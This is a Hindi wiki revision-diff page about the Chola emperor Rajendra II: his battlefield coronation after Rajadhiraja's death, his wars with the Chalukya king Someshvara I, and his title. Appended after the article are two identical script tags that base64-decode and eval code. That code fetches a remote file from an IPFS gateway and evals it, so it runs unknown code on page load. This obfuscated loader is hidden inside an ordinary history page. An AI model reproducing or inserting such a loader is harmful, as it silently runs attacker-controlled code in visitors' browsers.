Difference between revisions of "राजेन्द्र द्वितीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[राजाधिराज]] की मृत्यु के बाद उसके छोटे भाई राजेन्द्र द्वितीय ने रणक्षेत्र में ही चोलों के राजमुकुट को अपने सिर पर धारण कर लिया, और [[चालुक्य वंश|चालुक्य]] राज सोमेश्वर प्रथम आहवमल्ल के साथ युद्ध जारी रखा।  
+
'''राजेन्द्र द्वितीय''' (1052-1064 ई.) [[चोल वंश|चोल]] सम्राट [[राजेन्द्र प्रथम]] (1014-1044 ई.) का द्वितीय पुत्र और [[राजाधिराज]] (1044-1052 ई.) का छोटा भाई था। कोप्पम के युद्ध में जब राजेन्द्र द्वितीय का बड़ा भाई राजाधिराज [[कल्याणी कर्नाटक|कल्याणी]] के शासक [[सोमेश्वर प्रथम आहवमल्ल|सोमेश्वर आहवमल्ल]] के द्वारा मारा गया, तब वहीं रणभूमि में ही राजेन्द्र द्वितीय ने अपने भाई का मुकुट सिर पर धारण कर लिया और युद्ध जारी रखा।
*इन युद्धों में किसकी विजय हुई, यह निश्चित कर सकना सम्भव नहीं है, क्योंकि सोमेश्वर और राजेन्द्र द्वितीय दोनों ने ही अपनी प्रशस्तियों में अपनी विजयों का उल्लेख किया है।  
+
==अक्षुण साम्राज्य==
*सम्भवतः इन युद्धों में न चालुक्य राजा चोलों को परास्त सके, और न ही राजेन्द्र द्वितीय चालुक्यों को।
+
[[राजाधिराज]] की मृत्यु के बाद उसके छोटे भाई राजेन्द्र द्वितीय ने रणक्षेत्र में ही [[चोल राजवंश]] के राजमुकुट को अपने सिर पर धारण कर लिया और [[चालुक्य वंश|चालुक्य]] राजा सोमेश्वर आहवमल्ल के साथ युद्ध जारी रखा। इन युद्धों में किसकी विजय हुई, यह निश्चित कर सकना सम्भव नहीं है, क्योंकि सोमेश्वर और राजेन्द्र द्वितीय दोनों ने ही अपनी प्रशस्तियों में अपनी-अपनी विजयों का उल्लेख किया है। सम्भवतः इन युद्धों में न चालुक्य राजा चोलों को परास्त सके और न ही राजेन्द्र द्वितीय चालुक्यों को। वैसे राजेन्द्र द्वितीय ने चोलों की सत्ता और प्रतिष्ठा को पूर्ववत ही बनाये रखा और उसे क्षीण नहीं होने दिया।
 +
====उपाधि====
 +
राजेन्द्र द्वितीय की उपाधि 'प्रकेसरी' थी। उसके समय में भी [[चोल]]-[[चालुक्य]] संघर्ष अपनी चरम सीमा पर था। राजेन्द्र द्वितीय ने 'कुंडलसंगमम्' में चालुक्य सेना को पराजित किया था। सोमेश्वर प्रथम ने कुंडलसंगमम् के युद्व में पराजित होने के पश्चात् नदी में डूबकर आत्महत्या कर ली। उसने अपनी लड़की का [[विवाह]] पूर्वी चालुक्य नरेश राजेन्द्र के साथ किया था।
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
 
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 21: Line 14:
 
[[Category:चोल साम्राज्य]]
 
[[Category:चोल साम्राज्य]]
 
__INDEX__
 
__INDEX__
__INDEX__
+
__NOTOC__

Latest revision as of 14:11, 3 June 2012

rajendr dvitiy (1052-1064 ee.) chol samrat rajendr pratham (1014-1044 ee.) ka dvitiy putr aur rajadhiraj (1044-1052 ee.) ka chhota bhaee tha. koppam ke yuddh mean jab rajendr dvitiy ka b da bhaee rajadhiraj kalyani ke shasak someshvar ahavamall ke dvara mara gaya, tab vahian ranabhoomi mean hi rajendr dvitiy ne apane bhaee ka mukut sir par dharan kar liya aur yuddh jari rakha.

akshun samrajy

rajadhiraj ki mrityu ke bad usake chhote bhaee rajendr dvitiy ne ranakshetr mean hi chol rajavansh ke rajamukut ko apane sir par dharan kar liya aur chaluky raja someshvar ahavamall ke sath yuddh jari rakha. in yuddhoan mean kisaki vijay huee, yah nishchit kar sakana sambhav nahian hai, kyoanki someshvar aur rajendr dvitiy donoan ne hi apani prashastiyoan mean apani-apani vijayoan ka ullekh kiya hai. sambhavatah in yuddhoan mean n chaluky raja choloan ko parast sake aur n hi rajendr dvitiy chalukyoan ko. vaise rajendr dvitiy ne choloan ki satta aur pratishtha ko poorvavat hi banaye rakha aur use kshin nahian hone diya.

upadhi

rajendr dvitiy ki upadhi 'prakesari' thi. usake samay mean bhi chol-chaluky sangharsh apani charam sima par tha. rajendr dvitiy ne 'kuandalasangamamh' mean chaluky sena ko parajit kiya tha. someshvar pratham ne kuandalasangamamh ke yudv mean parajit hone ke pashchath nadi mean doobakar atmahatya kar li. usane apani l daki ka vivah poorvi chaluky naresh rajendr ke sath kiya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>